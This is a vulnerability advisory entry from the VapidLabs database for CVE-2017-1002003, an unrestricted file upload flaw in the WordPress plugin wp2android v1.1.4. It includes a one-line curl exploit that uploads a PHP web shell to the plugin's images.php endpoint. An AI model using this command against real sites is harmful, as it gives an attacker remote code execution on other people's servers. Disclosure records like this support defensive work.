The VapidLabs Vulnerability Database

Vulnerabilities Discovered by Larry W. Cashdollar
Examine in ATT&CK and D3FEND: CVE2CAPEC

Unrestricted File Upload vulnerability in Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4

ID: 930 | Date: 2017-03-01
CVE ID(s): CVE-2017-1002003
Summary: The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com.
Type: File upload vulnerability
Notified: 2017-03-01
Description: 
“Mobile App Plugin iPhone & Android Make your WordPress website to a Mobile app & mobile website”
Exploit: 
$ curl   -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/wp2android-turn-wp-site-into-android-app/server/images.php"
Download: https://wordpress.org/plugins-wp/wp2android-turn-wp-site-into-android-app/
URL: http://www.vapidlabs.com/advisory.php?v=182